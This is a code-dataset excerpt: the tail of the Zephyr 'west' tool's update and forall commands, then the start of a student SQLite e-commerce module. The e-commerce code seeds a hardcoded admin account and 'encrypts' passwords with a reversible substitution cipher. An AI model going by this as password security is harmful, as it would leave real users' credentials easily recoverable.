group = parser.add_argument_group(
title='local project clone caches',
description=textwrap.dedent('''\
Projects are usually initialized by fetching from their URLs, but
they can also be cloned from caches on the local file system.'''))
group.add_argument('--name-cache',
help='''cached repositories are in subdirectories
matching the names of projects to update''')
group.add_argument('--path-cache',
help='''cached repositories are in the same relative
paths as the workspace being updated''')
group = parser.add_argument_group(
title='fetching behavior',
description='By default, west update tries to avoid fetching.')
group.add_argument('-f', '--fetch', dest='fetch_strategy',
choices=['always', 'smart'],
help='''how to fetch projects when updating:
"always" fetches every project before update,
while "smart" (default) skips fetching projects
whose revisions are SHAs or tags available
locally''')
group.add_argument('-o', '--fetch-opt', action='append', default=[],
help='''additional option to pass to 'git fetch'
if fetching is necessary (e.g. 'o=--depth=1');
may be given more than once''')
group.add_argument('-n', '--narrow', action='store_true',
help='''fetch just the project revision if fetching
is necessary; do not pass --tags to git fetch
(may not work for SHA revisions depending on the Git
host)''')
group = parser.add_argument_group(
title='checked out branch behavior',
description=textwrap.dedent('''\
By default, locally checked out branches are left behind
when manifest-rev commits are checked out.'''))
group.add_argument('-k', '--keep-descendants', action='store_true',
help='''if a checked out branch is a descendant
of the new manifest-rev, leave it checked out
instead (takes priority over --rebase)''')
group.add_argument('-r', '--rebase', action='store_true',
help='''rebase any checked out branch onto the new
manifest-rev instead (leaving behind partial
rebases on error)''')
group = parser.add_argument_group(
title='advanced options')
group.add_argument('--group-filter', '--gf', action='append',
default=[], metavar='FILTER', dest='group_filter',
help='''proceed as if FILTER was appended to
manifest.group-filter; may be given multiple
times''')
group = parser.add_argument_group('deprecated options')
group.add_argument('-x', '--exclude-west', action='store_true',
help='ignored for backwards compatibility')
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
defaults to all active projects''')
return parser
def do_run(self, args, _):
self.die_if_no_git()
self._setup_logging(args)
self.init_state(args)
# We can't blindly call self._projects() here: manifests with
# imports are limited to plain 'west update', and cannot use
# 'west update PROJECT [...]'.
if not self.args.projects:
self.update_all()
else:
self.update_some()
def init_state(self, args):
# Helper for initializing instance state in response to
# command line args and configuration files.
self.args = args
if args.exclude_west:
log.wrn('ignoring --exclude-west')
self.narrow = args.narrow or config.getboolean('update', 'narrow',
fallback=False)
self.path_cache = args.path_cache or config.get('update', 'path-cache',
fallback=None)
self.name_cache = args.name_cache or config.get('update', 'name-cache',
fallback=None)
self.sync_submodules = config.getboolean('update', 'sync-submodules',
fallback=True)
self.group_filter: List[str] = []
def handle(group_filter_item):
item = group_filter_item.strip()
if not item.startswith(('-', '+')):
log.die(f'invalid --group-filter item {item}: '
'must start with - or +')
if not is_project_group(item[1:]):
log.die(f'invalid --group-filter item {item}: '
f'"{item[1:]}" is not a valid group name')
self.group_filter.append(item)
for item in args.group_filter:
if ',' in item:
for split_item in item.split(','):
handle(split_item)
else:
handle(item)
self.fs = self.fetch_strategy()
def update_all(self):
# Plain 'west update' is the 'easy' case: since the user just
# wants us to update everything, we don't have to keep track
# of projects appearing or disappearing as a result of fetching
# new revisions from projects with imports.
#
# So we just re-parse the manifest, but force west.manifest to
# call our importer whenever it encounters an import statement
# in a project, allowing us to control the recursion so it
# always uses the latest manifest data.
self.updated = set()
self.manifest = Manifest.from_file(
importer=self.update_importer,
import_flags=ImportFlag.FORCE_PROJECTS)
failed = []
for project in self.manifest.projects:
if (isinstance(project, ManifestProject) or
project.name in self.updated):
continue
try:
if not self.project_is_active(project):
log.dbg(f'{project.name}: skipping inactive project')
continue
self.update(project)
self.updated.add(project.name)
except subprocess.CalledProcessError:
failed.append(project)
self._handle_failed(self.args, failed)
def update_importer(self, project, path):
if isinstance(project, ManifestProject):
if not project.is_cloned():
log.die("manifest repository {project.abspath} was deleted")
else:
# There's no need to call self.project_is_active(),
# because the Manifest API guarantees that 'groups' cannot
# be combined with 'import' within a single project.
#
# That's good, because the semantics would be kind of hard
# to specify in this case.
assert not project.groups
self.update(project)
self.updated.add(project.name)
try:
return _manifest_content_at(project, path)
except FileNotFoundError:
# FIXME we need each project to have back-pointers
# to the manifest file where it was defined, so we can
# tell the user better context than just "run -vvv", which
# is a total fire hose.
name = project.name
sha = project.sha(QUAL_MANIFEST_REV)
if log.VERBOSE < log.VERBOSE_EXTREME:
suggest_vvv = ('\n'
' Use "west -vvv update" to debug.')
else:
suggest_vvv = ''
log.die(f"can't import from project {name}\n"
f' Expected to import from {path} at revision {sha}\n'
f' Hint: possible manifest file fixes for {name}:\n'
f' - set "revision:" to a git ref with this file '
f'at URL {project.url}\n'
' - remove the "import:"' + suggest_vvv)
def update_some(self):
# The 'west update PROJECT [...]' style invocation is only
# implemented for projects defined within the manifest
# repository.
#
# It's unclear how to do this properly in the case of
# a project A whose definition is imported from
# another project B, especially when B.revision is not
# a fixed SHA. Do we forcibly need to update B first?
# Should we skip it? Should it be configurable? Etc.
#
# For now, just refuse to do so. We can try to relax
# this restriction if it proves cumbersome.
if not self.has_manifest or self.manifest.has_imports:
projects = self.toplevel_projects()
assert self.has_manifest # toplevel_projects() must ensure this.
else:
projects = self._projects(self.args.projects)
failed = []
for project in projects:
if isinstance(project, ManifestProject):
continue
try:
self.update(project)
except subprocess.CalledProcessError:
failed.append(project)
self._handle_failed(self.args, failed)
def toplevel_projects(self):
# Return a list of projects from self.args.projects, or scream
# and die if any projects are either unknown or not defined in
# the manifest repository.
#
# As a side effect, ensures self.manifest is set.
ids = self.args.projects
assert ids
self.manifest = Manifest.from_file(
import_flags=ImportFlag.IGNORE_PROJECTS)
mr_projects, mr_unknown = projects_unknown(self.manifest, ids)
if not mr_unknown:
return mr_projects
try:
self.manifest = Manifest.from_file()
except ManifestImportFailed:
log.die('one or more projects are unknown or defined via '
'imports; please run plain "west update".')
_, unknown = projects_unknown(self.manifest, ids)
if unknown:
die_unknown(unknown)
else:
# All of the ids are known projects, but some of them
# are not defined in the manifest repository.
mr_unknown_set = set(mr_unknown)
from_projects = [p for p in ids if p in mr_unknown_set]
log.die('refusing to update project: ' +
" ".join(from_projects) + '\n' +
' It or they were resolved via project imports.\n'
' Only plain "west update" can currently update them.')
def fetch_strategy(self):
cfg = config.get('update', 'fetch', fallback=None)
if cfg is not None and cfg not in ('always', 'smart'):
log.wrn(f'ignoring invalid config update.fetch={cfg}; '
'choices: always, smart')
cfg = None
if self.args.fetch_strategy:
return self.args.fetch_strategy
elif cfg:
return cfg
else:
return 'smart'
def update_submodules(self, project):
# Updates given project submodules by using
# 'git submodule update --init --checkout --recursive' command
# from the project.path location.
if not project.submodules:
return
submodules = project.submodules
submodules_update_strategy = ('--rebase' if self.args.rebase
else '--checkout')
# For the list type, update given list of submodules.
if isinstance(submodules, list):
for submodule in submodules:
if self.sync_submodules:
project.git(['submodule', 'sync', '--recursive',
'--', submodule.path])
project.git(['submodule', 'update',
'--init', submodules_update_strategy,
'--recursive', submodule.path])
# For the bool type, update all project submodules
elif isinstance(submodules, bool):
if self.sync_submodules:
project.git(['submodule', 'sync', '--recursive'])
project.git(['submodule', 'update', '--init',
submodules_update_strategy, '--recursive'])
def update(self, project):
if self.args.stats:
stats = dict()
update_start = perf_counter()
else:
stats = None
take_stats = stats is not None
log.banner(f'updating {project.name_and_path}:')
# Make sure we've got a project to work with.
self.ensure_cloned(project, stats, take_stats)
# Point refs/heads/manifest-rev at project.revision,
# fetching it from the remote if necessary.
self.set_new_manifest_rev(project, stats, take_stats)
# Clean up refs/west/*. At some point, we should only do this
# if we've fetched, but we're leaving it here to clean up
# garbage in people's repositories introduced by previous
# versions of west that left refs in place here.
self.clean_refs_west(project, stats, take_stats)
# Make sure HEAD is pointing at *something*.
self.ensure_head_ok(project, stats, take_stats)
# Convert manifest-rev to a SHA.
sha = self.manifest_rev_sha(project, stats, take_stats)
# Based on the new manifest-rev SHA, HEAD, and the --rebase
# and --keep-descendants options, decide what we need to do
# now.
current_branch, is_ancestor, try_rebase = self.decide_update_strategy(
project, sha, stats, take_stats)
# Finish the update. This may be a nop if we're keeping
# descendants.
if self.args.keep_descendants and is_ancestor:
# A descendant is currently checked out and keep_descendants was
# given, so there's nothing more to do.
log.inf(f'west update: left descendant branch '
f'"{current_branch}" checked out; current status:')
if take_stats:
start = perf_counter()
project.git('status')
if take_stats:
stats['get current status'] = perf_counter - start
elif try_rebase:
# Attempt a rebase.
log.inf(f'west update: rebasing to {MANIFEST_REV} {sha}')
if take_stats:
start = perf_counter()
project.git('rebase ' + QUAL_MANIFEST_REV)
if take_stats:
stats['rebase onto new manifest-rev'] = perf_counter() - start
else:
# We can't keep a descendant or rebase, so just check
# out the new detached HEAD, then print some helpful context.
if take_stats:
start = perf_counter()
project.git('checkout --detach ' + sha)
if take_stats:
stats['checkout new manifest-rev'] = perf_counter() - start
_post_checkout_help(project, current_branch, sha, is_ancestor)
# Update project submodules, if it has any.
if take_stats:
start = perf_counter()
self.update_submodules(project)
if take_stats:
stats['update submodules'] = perf_counter() - start
# Print performance statistics.
if take_stats:
update_total = perf_counter() - update_start
slop = update_total - sum(stats.values())
stats['other work'] = slop
stats['TOTAL'] = update_total
log.inf('performance statistics:')
for stat, value in stats.items():
log.inf(f' {stat}: {value} sec')
def ensure_cloned(self, project, stats, take_stats):
# update() helper. Make sure project is cloned and initialized.
if take_stats:
start = perf_counter()
cloned = project.is_cloned()
if take_stats:
stats['check if cloned'] = perf_counter() - start
if not cloned:
if take_stats:
start = perf_counter()
self.init_project(project)
if take_stats:
stats['init'] = perf_counter() - start
def init_project(self, project):
# update() helper. Initialize an uncloned project repository.
# If there's a local clone available, it uses that. Otherwise,
# it just creates the local repository and sets up the
# convenience remote without fetching anything from the network.
cache_dir = self.project_cache(project)
if cache_dir is None:
log.small_banner(f'{project.name}: initializing')
init_cmd = ['init', project.abspath]
# Silence the very verbose and repetitive init.defaultBranch
# warning (10 lines per new git clone). The branch
# 'placeholder' will never have any commit so it will never
# actually exist.
if self.git_version_info >= (2, 28, 0):
init_cmd.insert(1, '--initial-branch=init_placeholder')
project.git(init_cmd, cwd=self.topdir)
# This remote is added as a convenience for the user.
# However, west always fetches project data by URL, not name.
# The user is therefore free to change the URL of this remote.
project.git(f'remote add -- {project.remote_name} {project.url}')
else:
log.small_banner(f'{project.name}: cloning from {cache_dir}')
# Clone the project from a local cache repository. Set the
# remote name to the value that would be used without a
# cache.
project.git(['clone', '--origin', project.remote_name,
cache_dir, project.abspath], cwd=self.topdir)
# Reset the remote's URL to the project's fetch URL.
project.git(['remote', 'set-url', project.remote_name,
project.url])
# Make sure we have a detached HEAD so we can delete the
# local branch created by git clone.
project.git('checkout --quiet --detach HEAD')
# Find the name of any local branch created by git clone.
# West commits to only touching 'manifest-rev' in the
# local branch name space.
local_branches = project.git(
['for-each-ref', '--format', '%(refname)', 'refs/heads/*'],
capture_stdout=True).stdout.decode('utf-8').splitlines()
# This should contain at most one branch in current
# versions of git, but we might as well get them all just
# in case that changes.
for branch in local_branches:
if not branch:
continue
# This is safe: it can't be garbage collected by git before we
# have a chance to use it, because we have another ref, namely
# f'refs/remotes/{project.remote_name}/{branch}'.
project.git(['update-ref', '-d', branch])
def project_cache(self, project):
# Find the absolute path to a pre-existing local clone of a project
# and return it. If the search fails, return None.
if self.name_cache is not None:
maybe = Path(self.name_cache) / project.name
if maybe.is_dir():
log.dbg(
f'found {project.name} in --name-cache {self.name_cache}',
level=log.VERBOSE_VERY)
return os.fspath(maybe)
else:
log.dbg(
f'{project.name} not in --name-cache {self.name_cache}',
level=log.VERBOSE_VERY)
elif self.path_cache is not None:
maybe = Path(self.path_cache) / project.path
if maybe.is_dir():
log.dbg(
f'found {project.path} in --path-cache {self.path_cache}',
level=log.VERBOSE_VERY)
return os.fspath(maybe)
else:
log.dbg(
f'{project.path} not in --path-cache {self.path_cache}',
level=log.VERBOSE_VERY)
return None
def set_new_manifest_rev(self, project, stats, take_stats):
# update() helper. Make sure project's manifest-rev is set to
# the latest value it should be.
if self.fs == 'always' or _rev_type(project) not in ('tag', 'commit'):
self.fetch(project, stats, take_stats)
else:
log.dbg('skipping unnecessary fetch')
if take_stats:
start = perf_counter()
_update_manifest_rev(project, f'{project.revision}^{{commit}}')
if take_stats:
stats['set manifest-rev'] = perf_counter() - start
def fetch(self, project, stats, take_stats):
# Fetches rev (or project.revision) from project.url in a way that
# guarantees any branch, tag, or SHA (that's reachable from a
# branch or a tag) available on project.url is part of what got
# fetched.
#
# Returns a git revision which hopefully can be peeled to the
# newly-fetched SHA corresponding to rev. "Hopefully" because
# there are many ways to spell a revision, and they haven't all
# been extensively tested.
if take_stats:
start = perf_counter()
rev = project.revision
# Fetch the revision into the local ref space.
#
# The following two-step approach avoids a "trying to write
# non-commit object" error when the revision is an annotated
# tag. ^{commit} type peeling isn't supported for the <src> in a
# <src>:<dst> refspec, so we have to do it separately.
if _maybe_sha(rev) and not self.narrow:
# We can't in general fetch a SHA from a remote, as some hosts
# forbid it for security reasons. Let's hope it's reachable
# from some branch.
refspec = f'refs/heads/*:{QUAL_REFS}*'
next_manifest_rev = project.revision
else:
# Either the revision is definitely not a SHA and is
# therefore safe to fetch directly, or the user said
# that's OK. This avoids fetching unnecessary refs from
# the remote.
#
# We update manifest-rev to FETCH_HEAD instead of using a
# refspec in case the revision is a tag, which we can't use
# from a refspec.
refspec = project.revision
next_manifest_rev = 'FETCH_HEAD^{commit}'
log.small_banner(f'{project.name}: fetching, need revision {rev}')
# --tags is required to get tags if we're not run as 'west
# update --narrow', since the remote is specified as a URL.
tags = (['--tags'] if not self.narrow else [])
clone_depth = (['--depth', str(project.clone_depth)] if
project.clone_depth else [])
# -f is needed to avoid errors in case multiple remotes are
# present, at least one of which contains refs that can't be
# fast-forwarded to our local ref space.
project.git(['fetch', '-f'] + tags + clone_depth +
self.args.fetch_opt +
['--', project.url, refspec])
if take_stats:
stats['fetch'] = perf_counter() - start
# Update manifest-rev, leaving an entry in the reflog.
if take_stats:
start = perf_counter()
new_ref = project.sha(next_manifest_rev)
_update_manifest_rev(project, new_ref)
if take_stats:
stats['set manifest-rev'] = perf_counter() - start
@staticmethod
def clean_refs_west(project, stats, take_stats):
# update() helper. Make sure refs/west/* is empty after
# setting the new manifest-rev.
#
# Head of manifest-rev is now pointing to current manifest revision.
# Thus it is safe to unconditionally clear out the refs/west space.
#
# Doing this here instead of in Update.fetch() ensures that it
# gets cleaned up when users upgrade from older versions of
# west (like 0.6.x) that didn't handle this properly.
#
# In the future, this can be moved into Update.fetch() after
# the install base of older west versions is expected to be
# smaller.
if take_stats:
start = perf_counter()
_clean_west_refspace(project)
if take_stats:
stats['clean up refs/west/*'] = perf_counter() - start
@staticmethod
def ensure_head_ok(project, stats, take_stats):
# update() helper. Ensure HEAD points at something reasonable.
if take_stats:
start = perf_counter()
head_ok = _head_ok(project)
if take_stats:
stats['check HEAD is ok'] = perf_counter() - start
if not head_ok:
# If nothing is checked out (which usually only happens if
# we called Update.init_project() above), check out
# 'manifest-rev' in a detached HEAD state.
#
# Otherwise, it's possible for the initial state to have
# nothing checked out and HEAD pointing to a non-existent
# branch. This causes the 'git rev-parse --abbrev-ref HEAD'
# which happens later in the update to fail.
#
# The --detach flag is strictly redundant here, because
# the qualified manifest-rev form detaches HEAD, but
# it avoids a spammy detached HEAD warning from Git.
if take_stats:
start = perf_counter()
project.git('checkout --detach ' + QUAL_MANIFEST_REV)
if take_stats:
stats['checkout new manifest-rev'] = perf_counter() - start
@staticmethod
def manifest_rev_sha(project, stats, take_stats):
# update() helper. Get the SHA for manifest-rev.
try:
if take_stats:
start = perf_counter()
return project.sha(QUAL_MANIFEST_REV)
if take_stats:
stats['get new manifest-rev SHA'] = perf_counter() - start
except subprocess.CalledProcessError:
# This is a sign something's really wrong. Add more help.
log.err(f'no SHA for branch {MANIFEST_REV} '
f'in {project.name_and_path}; was the branch deleted?')
raise
def decide_update_strategy(self, project, sha, stats, take_stats):
# update() helper. Decide on whether we have an ancestor
# branch or whether we should try to rebase.
if take_stats:
start = perf_counter()
cp = project.git('rev-parse --abbrev-ref HEAD', capture_stdout=True)
if take_stats:
stats['get current branch HEAD'] = perf_counter() - start
current_branch = cp.stdout.decode('utf-8').strip()
if current_branch != 'HEAD':
if take_stats:
start = perf_counter()
is_ancestor = project.is_ancestor_of(sha, current_branch)
if take_stats:
stats['check if HEAD is ancestor of manifest-rev'] = \
perf_counter() - start
try_rebase = self.args.rebase
else: # HEAD means no branch is checked out.
# If no branch is checked out, 'rebase' and
# 'keep_descendants' don't matter.
is_ancestor = False
try_rebase = False
return current_branch, is_ancestor, try_rebase
def project_is_active(self, project):
return self.manifest.is_active(project, extra_filter=self.group_filter)
class ForAll(_ProjectCommand):
def __init__(self):
super().__init__(
'forall',
'run a command in one or more local projects',
textwrap.dedent('''\
Runs a shell (on a Unix OS) or batch (on Windows) command
within the repository of each of the specified PROJECTs.
If the command has multiple words, you must quote the -c
option to prevent the shell from splitting it up. Since
the command is run through the shell, you can use
wildcards and the like.
For example, the following command will list the contents
of proj-1's and proj-2's repositories on Linux and macOS,
in long form:
west forall -c "ls -l" proj-1 proj-2
'''))
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder,
epilog=ACTIVE_CLONED_PROJECTS_HELP)
parser.add_argument('-c', dest='subcommand', metavar='COMMAND',
required=True)
parser.add_argument('-a', '--all', action='store_true',
help='include inactive projects'),
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
defaults to active cloned projects''')
return parser
def do_run(self, args, user_args):
self._setup_logging(args)
failed = []
for project in self._cloned_projects(args, only_active=not args.all):
log.banner(
f'running "{args.subcommand}" in {project.name_and_path}:')
rc = subprocess.Popen(args.subcommand, shell=True,
cwd=project.abspath).wait()
if rc:
failed.append(project)
self._handle_failed(args, failed)
class Topdir(_ProjectCommand):
def __init__(self):
super().__init__(
'topdir',
'print the top level directory of the workspace',
textwrap.dedent('''\
Prints the absolute path of the current west workspace's
top directory.
This is the directory containing .west. All project
paths in the manifest are relative to this top directory.'''))
def do_add_parser(self, parser_adder):
return self._parser(parser_adder)
def do_run(self, args, user_args):
log.inf(PurePath(self.topdir).as_posix())
class SelfUpdate(_ProjectCommand):
def __init__(self):
super().__init__(
'selfupdate',
'deprecated; exists for backwards compatibility',
'Do not use. You can upgrade west with pip only from v0.6.0.')
def do_add_parser(self, parser_adder):
return self._parser(parser_adder)
def do_run(self, args, user_args):
log.die(self.description)
#
# Private helper routines.
#
def _clean_west_refspace(project):
# Clean the refs/west space to ensure they do not show up in 'git log'.
# Get all the ref names that start with refs/west/.
list_refs_cmd = ('for-each-ref --format="%(refname)" -- ' +
QUAL_REFS + '**')
cp = project.git(list_refs_cmd, capture_stdout=True)
west_references = cp.stdout.decode('utf-8').strip()
# Safely delete each one.
for ref in west_references.splitlines():
delete_ref_cmd = 'update-ref -d ' + ref
project.git(delete_ref_cmd)
def _update_manifest_rev(project, new_manifest_rev):
project.git(['update-ref',
'-m', f'west update: moving to {new_manifest_rev}',
QUAL_MANIFEST_REV, new_manifest_rev])
def _maybe_sha(rev):
# Return true if and only if the given revision might be a SHA.
try:
int(rev, 16)
except ValueError:
return False
return len(rev) <= 40
def _rev_type(project, rev=None):
# Returns a "refined" revision type of rev (default:
# project.revision) as one of the following strings: 'tag', 'tree',
# 'blob', 'commit', 'branch', 'other'.
#
# The approach combines git cat-file -t and git rev-parse because,
# while cat-file can for sure tell us a blob, tree, or tag, it
# doesn't have a way to disambiguate between branch names and
# other types of commit-ishes, like SHAs, things like "HEAD" or
# "HEAD~2", etc.
#
# We need this extra layer of refinement to be able to avoid
# fetching SHAs that are already available locally.
#
# This doesn't belong in manifest.py because it contains "west
# update" specific logic.
if not rev:
rev = project.revision
cp = project.git(['cat-file', '-t', rev], check=False,
capture_stdout=True, capture_stderr=True)
stdout = cp.stdout.decode('utf-8').strip()
if cp.returncode:
return 'other'
elif stdout in ('blob', 'tree', 'tag'):
return stdout
elif stdout != 'commit': # just future-proofing
return 'other'
# to tell branches, lightweight tags, and commits apart, we need rev-parse.
cp = project.git(['rev-parse', '--verify', '--symbolic-full-name', rev],
check=False, capture_stdout=True, capture_stderr=True)
if cp.returncode:
# This can happen if the ref name is ambiguous, e.g.:
#
# $ git update-ref ambiguous-ref HEAD~2
# $ git checkout -B ambiguous-ref
#
# Which creates both .git/ambiguous-ref and
# .git/refs/heads/ambiguous-ref.
return 'other'
stdout = cp.stdout.decode('utf-8').strip()
if stdout.startswith('refs/heads'):
return 'branch'
elif stdout.startswith('refs/tags'):
# Annotated tags are handled above. Lightweight tags are
# handled here.
return 'tag'
elif not stdout:
return 'commit'
else:
return 'other'
def _head_ok(project):
# Returns True if the reference 'HEAD' exists and is not a tag or remote
# ref (e.g. refs/remotes/origin/HEAD).
# Some versions of git will report 1, when doing
# 'git show-ref --verify HEAD' even if HEAD is valid, see #119.
# 'git show-ref --head <reference>' will always return 0 if HEAD or
# <reference> is valid.
# We are only interested in HEAD, thus we must avoid <reference> being
# valid. '/' can never point to valid reference, thus 'show-ref --head /'
# will return:
# - 0 if HEAD is present
# - 1 otherwise
return project.git('show-ref --quiet --head /',
check=False).returncode == 0
def _post_checkout_help(project, branch, sha, is_ancestor):
# Print helpful information to the user about a project that
# might have just left a branch behind.
if branch == 'HEAD':
# If there was no branch checked out, there are no
# additional diagnostics that need emitting.
return
rel = relpath(project.abspath)
if is_ancestor:
# If the branch we just left behind is a descendant of
# the new HEAD (e.g. if this is a topic branch the
# user is working on and the remote hasn't changed),
# print a message that makes it easy to get back,
# no matter where in the workspace os.getcwd() is.
log.wrn(f'left behind {project.name} branch "{branch}"; '
f'to switch back to it (fast forward):\n'
f' git -C {rel} checkout {branch}')
log.dbg('(To do this automatically in the future,',
'use "west update --keep-descendants".)')
else:
# Tell the user how they could rebase by hand, and
# point them at west update --rebase.
log.wrn(f'left behind {project.name} branch "{branch}"; '
f'to rebase onto the new HEAD:\n'
f' git -C {rel} rebase {sha} {branch}')
log.dbg('(To do this automatically in the future,',
'use "west update --rebase".)')
def projects_unknown(manifest, projects):
# Retrieve the projects with get_projects(project,
# only_cloned=False). Return a pair: (projects, unknown)
# containing either a projects list and None or None and a list of
# unknown project IDs.
try:
return (manifest.get_projects(projects, only_cloned=False), None)
except ValueError as ve:
if len(ve.args) != 2:
raise # not directly raised by get_projects()
unknown = ve.args[0]
if not unknown:
raise # only_cloned is False, so this "can't happen"
return (None, unknown)
def die_unknown(unknown):
# Scream and die about unknown projects.
s = 's' if len(unknown) > 1 else ''
names = ' '.join(unknown)
log.die(f'unknown project name{s}/path{s}: {names}\n'
' Hint: use "west list" to list all projects.')
#
# Special files and directories in the west workspace.
#
# These are given variable names for clarity, but they can't be
# changed without propagating the changes into west itself.
#
# Top-level west directory, containing west itself and the manifest.
WEST_DIR = '.west'
# Default manifest repository URL.
MANIFEST_URL_DEFAULT = 'https://github.com/zephyrproject-rtos/zephyr'
#
# Other shared globals.
#
ACTIVE_PROJECTS_HELP = '''\
ACTIVE PROJECTS
---------------
Default output is limited to "active" projects as determined by the:
- "group-filter" manifest file section
- "manifest.group-filter" local configuration option in .west/config
To include inactive projects as well, use "--all" or give an explicit
list of projects (by name or path). See the west documentation for
more details on active projects.
'''
ACTIVE_CLONED_PROJECTS_HELP = f'''\
{ACTIVE_PROJECTS_HELP}
Regardless of the above, output is limited to cloned projects.
'''
#
# Helper class for creating format string keys that are expensive or
# undesirable to compute if not needed.
#
class DelayFormat:
'''Delays formatting an object.'''
def __init__(self, obj):
'''Delay formatting `obj` until a format operation using it.
:param obj: object to format
If callable(obj) returns True, then obj() will be used as the
string to be formatted. Otherwise, str(obj) is used.'''
self.obj = obj
self.as_str = None
def __format__(self, format_spec):
if self.as_str is None:
if callable(self.obj):
self.as_str = self.obj()
assert isinstance(self.as_str, str)
else:
self.as_str = str(self.obj)
return ('{:' + format_spec + '}').format(self.as_str)
#
# Logging helpers
#
class ProjectCommandLogFormatter(logging.Formatter):
def __init__(self):
super().__init__(fmt='%(name)s: %(message)s')
class ProjectCommandLogHandler(logging.Handler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setFormatter(ProjectCommandLogFormatter())
def emit(self, record):
fmt = self.format(record)
lvl = record.levelno
if lvl > logging.CRITICAL:
log.die(fmt)
elif lvl >= logging.ERROR:
log.err(fmt)
elif lvl >= logging.WARNING:
log.wrn(fmt)
elif lvl >= logging.INFO:
log.inf(fmt)
elif lvl >= logging.DEBUG:
log.dbg(fmt)
else:
log.dbg(fmt, level=log.VERBOSE_EXTREME)
``` |
{
"source": "johnvincentmiro/PROG8420-ECOM",
"score": 3
} |
#### File: PROG8420-ECOM/Ecommerceapp/elib.py
```python
import sqlite3
import re
import sys
import time
import datetime
import csv
##tables creator
def tbcreator():
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute('''CREATE TABLE user
("USER_ID" INTEGER NOT NULL,
"LOGIN" TEXT NOT NULL UNIQUE,
"CRYPT_PASS" TEXT NOT NULL,
"ACCESS_COUNT" INTEGER NOT NULL,
"ACS" TEXT NOT NULL,
PRIMARY KEY("USER_ID" AUTOINCREMENT))''')
c.execute('''CREATE TABLE products
("P_ID" INTEGER NOT NULL,
"desc" TEXT NOT NULL UNIQUE,
"price" FLOAT NOT NULL,
"tag" TEXT NOT NULL,
"qty" INTEGER NOT NULL,
PRIMARY KEY("P_ID" AUTOINCREMENT))''')
c.execute('''CREATE TABLE cart
("C_ID" INTEGER NOT NULL,
"LOGIN" TEXT NOT NULL,
"desc" TEXT NOT NULL,
"price" FLOAT NOT NULL,
"tag" TEXT NOT NULL,
"qty" INTEGER NOT NULL,
"status" TEXT NOT NULL,
"date" TEXT NOT NULL,
PRIMARY KEY("C_ID" AUTOINCREMENT))''')
c.execute("INSERT INTO user(LOGIN, CRYPT_PASS, ACCESS_COUNT, ACS) VALUES ('admin', 'tecsg', '0', 'A' )")
conn.commit()
conn.close()
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
except PermissionError:
print("file in use on your system process")
def hme_pg():
print("""
Welcome to the MOB Retail Store
1. Search Products
2. Buy
3. Your Cart
4. Order History
5. Logout
""")
##Encryption and decryption
def encrypt(txt):
x = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
y = 'TIMEODANSFRBCGHJKLPQUVWXYZtimeodansfrbcghjklpquvwxyz9876543210'
table = str.maketrans(x, y)
transl = txt.translate(table)
return transl
def decrypt(txt):
x = 'TIMEODANSFRBCGHJKLPQUVWXYZtimeodansfrbcghjklpquvwxyz9876543210'
y = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
table = str.maketrans(x, y)
transl = txt.translate(table)
return transl
def db_check():
conn = sqlite3.connect("ecom.db", timeout=1)
c = conn.cursor()
try:
c.execute("UPDATE user SET ACCESS_COUNT = ACCESS_COUNT + 1 WHERE LOGIN =?", ['admin'])
conn.commit()
conn.close()
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again")
sys.exit()
def remove(string):
unamestrip = string.replace(" ", "")
return unamestrip
def check_pass(pwd):
pattern = "^[A-Za-z0-9]*$"
while not re.match(pattern, pwd):
pwd = input("Enter account password to add (letters and numbers only): ")
else:
pass
return pwd
def tag_check(tag):
pattern = "^[A-Za-z]*$"
while not re.match(pattern, tag):
tag = input("Enter Tag category (One Word with letters only): ")
else:
pass
return tag
def check_email(uname):
regex = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
while not re.fullmatch(regex, uname):
uname = input("Invalid email please check entry Enter account email to add: ")
else:
pass
return uname
def check_in(twd):
pattern = "^[0-9]*$"
while not re.match(pattern, twd):
twd = input("Enter account number (numbers): ")
else:
pass
return twd
def check_amt(twd):
pattern = "^[0-9.]*$"
while not re.match(pattern, twd):
twd = input("Enter amount up to two decimal places (numbers): ")
else:
pass
return twd
def create_prd(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT * FROM products WHERE desc=?", [desc])
if c.fetchone():
print("Product Description already exists, please try again with different Description \nOr use Search function to update an existing product \nplease wait...")
time.sleep(2)
else:
price = check_amt(input("Enter product price:-->"))
cat = tag_check(remove(input("Enter product category tag:-->")))
tag = cat.upper()
qty = check_in(input("Enter product qty available:-->"))
c.execute("INSERT INTO products(desc, price, tag, qty) VALUES (?, ?, ?, ?)", [desc, price, tag, qty])
conn.commit()
conn.close()
print("Product: "+desc+"\nCreation successfull \nplease wait...")
time.sleep(2)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
print("This product already exists")
sys.exit()
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process")
sys.exit()
def search():
while True:
print("""
Search By Tag or Description
Tags are products categories for example: SHOES/VEG/FRUITS/CLOTHING
1. Tag
2. Description
3. Back
""")
s_choice = input("Please enter desired operation: ")
if s_choice == "1":
wrd = input("Enter tag description: ")
word = wrd.strip()
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT desc, price, tag FROM products WHERE tag LIKE ?", (['%'+word+'%']))
record = c.fetchall()
for row in record:
print(
'Product Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Category:- ', row[2], "\n"
)
conn.close()
else:
print("No more results/End of results")
conn.close()
time.sleep(3)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
